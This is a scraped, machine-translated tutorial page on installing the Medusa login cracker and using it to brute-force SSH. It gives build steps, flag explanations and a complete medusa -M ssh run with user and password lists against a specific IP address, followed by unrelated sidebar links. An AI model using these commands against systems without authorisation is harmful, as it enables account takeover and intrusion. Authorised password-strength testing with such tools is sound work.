当前位置:网站首页>Medusa installation and simple use
Medusa installation and simple use
2022-07-05 02:21:00 【Heyue Keyan】
medusa Installation and ease of use
1、 Compile and install manually medusa
yum install openssl-devel libssh2-devel -y # Install dependency packages
tar zxvf medusa-2.2.tar.gz
cd medusa-2.2/
./configure && make -j 4 && make install
2、medusa Parameter description :
-H [File] Include the target host name or IP The file of
-U [File] The user name file that contains the test
-p[File] Contains the password file for the test
-O[File] Log information file , Save the results of brute force cracking
-M[text] Module execution name
-t[num] Set the number of threads
-n[num] Use for non-default TCP port number Specify non 22 Port number , Default 22
3、 Blast ssh
Specify by file host and user,host.txt Is the target host name or IP Address ,user.txt Specify required burst Crack the user name , Use wordlist.txt Dictionary burst .
head -n 20 wordlist.txt > b.txt # take 20 A code , Put it in b.txt. If straight Use this dictionary , It took too long
echo 123456 >> b.txt # Write the correct password
echo 219.143.129.64 > /root/host.txt # Specified burst IP, A line of one .
vim /root/users.txt # Insert the following multiple users
medusa -M ssh -H ./host.txt -U ./users.txt -t 8 -P b.txt -O hack.log
After successful cracking, it will display success word , And put the result of the burst into hack.log in
边栏推荐
- openresty ngx_lua執行階段
- How to build a technical team that will bring down the company?
- 使用druid连接MySQL数据库报类型错误
- Visual explanation of Newton iteration method
- PowerShell: use PowerShell behind the proxy server
- Why do you understand a16z? Those who prefer Web3.0 Privacy Infrastructure: nym
- 如何搭建一支搞垮公司的技术团队?
- A label making navigation bar
- Open source SPL optimized report application coping endlessly
- Yyds dry inventory jetpack hit dependency injection framework Getting Started Guide
猜你喜欢
PowerShell: use PowerShell behind the proxy server
Win: use PowerShell to check the strength of wireless signal
Missile interception -- UPC winter vacation training match
A label making navigation bar
. Net starts again happy 20th birthday
Introduce reflow & repaint, and how to optimize it?
Chinese natural language processing, medical, legal and other public data sets, sorting and sharing
Stored procedure and stored function in Oracle
The perfect car for successful people: BMW X7! Superior performance, excellent comfort and safety
Tucson will lose more than $400million in the next year
随机推荐
Video display and hiding of imitation tudou.com
He was laid off.. 39 year old Ali P9, saved 150million
Win:使用 Shadow Mode 查看远程用户的桌面会话
A label colorful navigation bar
Win:将一般用户添加到 Local Admins 组中
R language uses logistic regression and afrima, ARIMA time series models to predict world population
JVM - when multiple threads initialize the same class, only one thread is allowed to initialize
Visual explanation of Newton iteration method
Erreur de type de datagramme MySQL en utilisant Druid
Subject 3 how to turn on the high beam diagram? Is the high beam of section 3 up or down
[uc/os-iii] chapter 1.2.3.4 understanding RTOS
RichView TRVStyle MainRVStyle
Luo Gu Pardon prisoners of war
runc hang 导致 Kubernetes 节点 NotReady
Practice of tdengine in TCL air conditioning energy management platform
Blue bridge - maximum common divisor and minimum common multiple
Visual studio 2019 set transparent background (fool teaching)
Win:使用 PowerShell 检查无线信号的强弱
Talk about the things that must be paid attention to when interviewing programmers
Summary and practice of knowledge map construction technology